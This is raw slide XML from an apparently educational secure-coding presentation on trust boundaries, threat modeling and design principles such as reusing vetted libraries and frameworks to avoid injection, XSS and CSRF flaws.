                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Validation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="1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799" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Boundary?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271197" y="4383082"/>
            <a:ext cx="596110" cy="689430"/>
            <a:chOff x="11274133" y="4383330"/>
            <a:chExt cx="596265" cy="689610"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11280483" y="4529967"/>
              <a:ext cx="532130" cy="536575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="532129" h="536575">
                  <a:moveTo>
                    <a:pt x="277480" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232016" y="2670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187662" y="13021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145462" y="30809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106457" y="55790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71689" y="87722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42201" y="126360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19892" y="169563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5899" y="214659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="260603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967" y="306353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11578" y="350866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28607" y="393097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52830" y="432005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84022" y="466546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121957" y="495676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164536" y="517509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209116" y="530930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254658" y="536184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300125" y="533514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344479" y="523163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386682" y="505375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425695" y="480393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460482" y="448462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490003" y="409824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512275" y="366620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526238" y="321524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532115" y="275580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530132" y="229830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520510" y="185318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503475" y="143086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479249" y="104179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448056" y="69638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410120" y="40508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367575" y="18675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323014" y="5253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27748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1280483" y="4529967"/>
              <a:ext cx="532130" cy="536575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="532129" h="536575">
                  <a:moveTo>
                    <a:pt x="42201" y="126360"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71689" y="87722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106457" y="55790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145462" y="30809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187662" y="13021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232016" y="2670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277480" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323014" y="5253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367575" y="18675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410120" y="40508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448056" y="69638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479249" y="104179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503475" y="143086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520510" y="185318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530132" y="229830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532115" y="275580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526238" y="321524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512275" y="366620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490003" y="409824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460482" y="448462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425695" y="480393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386682" y="505375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344479" y="523163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300125" y="533514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254658" y="536184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209116" y="530930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164536" y="517509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121957" y="495676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84022" y="466546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52830" y="432005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28607" y="393097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11578" y="350866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967" y="306353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="260603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5899" y="214659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19892" y="169563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42201" y="126360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46799" y="4654530"/>
              <a:ext cx="112305" cy="1123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1869" y="4746988"/>
              <a:ext cx="313392" cy="2003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25401" y="4427936"/>
              <a:ext cx="224996" cy="17197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444102" y="4383330"/>
              <a:ext cx="426084" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="426084" h="117475">
                  <a:moveTo>
                    <a:pt x="214760" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="11577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235735" y="116977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425938" y="95917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147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09395" y="4403537"/>
              <a:ext cx="333155" cy="202378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36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4885494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5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5" dirty="0"/>
              <a:t>Establish</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Boundaries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Application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10105933" cy="4100397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Web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App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Boundary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requirements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All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inputs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must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sanitized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all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potential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attack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vectors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Guest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accounts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limited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inside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Vendor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 Customer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streams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will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separated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load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balancer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lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50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When complete,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Boundaries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tells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everything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need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defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2734"/>
              </a:lnSpc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know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about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levels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of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trust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are required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859532" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="844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They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help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make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design decisions,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settle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differences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review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requirements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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80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Boundaries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typically created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during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or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after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Threat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Modeling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process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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2639427"/>
            <a:ext cx="3470641" cy="2737472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="35551" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-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Design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6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Establish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Boundaries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6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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Don't</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> Reinvent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-4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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-3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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Wheel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7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Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="199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Mechanism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55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199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Reluctance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55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Open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-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Design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7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Minimize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Attack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Surface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55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Weakest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Link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742" y="367320"/>
            <a:ext cx="10512862" cy="818302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10515600" h="818515">
                <a:moveTo>
                  <a:pt x="0" y="818388"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10515600" y="818388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10515600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="818388"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25908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pPr defTabSz="914126"/>
            <a:endParaRPr sz="179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700" y="380397"/>
            <a:ext cx="5704624" cy="749105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12696">
              <a:lnSpc>
                <a:spcPts val="2849"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10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</a:t>
            </a:r>
            <a:endParaRPr sz="2499"/>
          </a:p>
          <a:p>
            <a:pPr marL="12696">
              <a:lnSpc>
                <a:spcPts val="2849"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Don't</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Reinvent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Wheel</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0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4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8845862" y="2433062"/>
            <a:ext cx="1065253" cy="690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 defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2634"/>
              </a:lnSpc>
            </a:pP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ted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="21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code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R="74273" algn="r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bilities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700" y="1312641"/>
            <a:ext cx="9916752" cy="3281460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lot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code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available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 it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has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been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written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talented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people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 it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has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been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thoroughly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vetted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tested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known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more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untes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Check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Common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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Vulnerability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Database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current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vulnera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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://nvd.nist.gov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1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When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there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good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code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available,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don't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try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to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create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own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uri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di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fic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do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4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amew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rk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vid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ou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ldn't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tim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el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30682" y="6450406"/>
            <a:ext cx="141568" cy="151284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900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>21</a:t>
            </a:r>
            <a:endParaRPr sz="900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60309" y="1056750"/>
            <a:ext cx="2893322" cy="190602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735087" y="6442483"/>
            <a:ext cx="4216572" cy="175002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13332" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1050" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://images.thezooom.com/uploads/2012/08/Dont-reinvent-the-wheel.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="105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39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122278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5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35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0" dirty="0"/>
              <a:t>Don't</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Reinvent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Wheel</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Examples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0"/>
            <a:ext cx="10350979" cy="3430646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Cryptography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difficult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implement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well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creating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own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cryptography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methods,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do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numerical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expertise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know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secure?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implementing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existing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algorithms,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get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perfectly?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ythin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less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per</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-40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wi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vulne</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-5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able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amount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time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invest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will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far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larger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than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time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required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existing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library,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which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is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likely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free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152989" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2379"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4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intend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seek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any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compliance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certifications,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will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require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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="-67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certified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cryptography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library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9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FIPS-140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list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certified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libraries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All Applications</a:t>
            </a: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1293813" y="1676399"/>
            <a:ext cx="10149250" cy="4906497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3838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6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lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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dirty="0"/>
              <a:t>To verify and ensure no one can breach the databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Network applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>End user applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10818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40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122278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5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35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0" dirty="0"/>
              <a:t>Don't</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>Reinvent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Wheel</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Examples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675" y="1312640"/>
            <a:ext cx="8134771" cy="3454532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Consider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using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Application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="239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Framework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  <a:tabLst>
                <a:tab pos="6562661" algn="l"/>
              </a:tabLst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Spring MVC, Grails,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Google</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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Web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Toolkit,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Spring,	Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="219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Faces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Many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built-in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suppor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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="5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50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 extensive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authentication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session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model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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Input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validation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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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35" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>SQL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Injection avoidance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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="3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30" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>XSS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avoidance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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Path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traversal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 avoidance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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="1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Cross-site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Request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Forgery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 protection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save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time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code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already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well-tested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Common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Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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Don't</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Reinvent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="4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The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Wheel</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="5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–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499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Security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267123"/>
            <a:ext cx="9247001" cy="2729154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Alias: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None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temptation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among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developers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create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their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own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solutions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Estimates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time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developing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software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notoriously</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199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under-stated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Proven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software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typically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faster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implement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more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stin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sof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vid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ad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nal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ilities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Consequences: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9766" y="3968452"/>
            <a:ext cx="3664899" cy="732599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="30472" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="2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igh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2696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imp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ov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624371" y="4240827"/>
            <a:ext cx="4621596" cy="658958"/>
            <a:chOff x="6626097" y="4241038"/>
            <a:chExt cx="4622800" cy="659130"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6632447" y="4247388"/>
              <a:ext cx="4610100" cy="646430"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4610100" h="646429">
                  <a:moveTo>
                    <a:pt x="4610100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4610100" y="646176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610100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6632447" y="4247388"/>
              <a:ext cx="4610100" cy="646430"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4610100" h="646429">
                  <a:moveTo>
                    <a:pt x="0" y="646176"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610100" y="646176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="646176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710963" y="4266220"/>
            <a:ext cx="4076273" cy="573891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marR="5078" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1799" spc="-1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srgbClr val="538235"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>percentage</a:t>
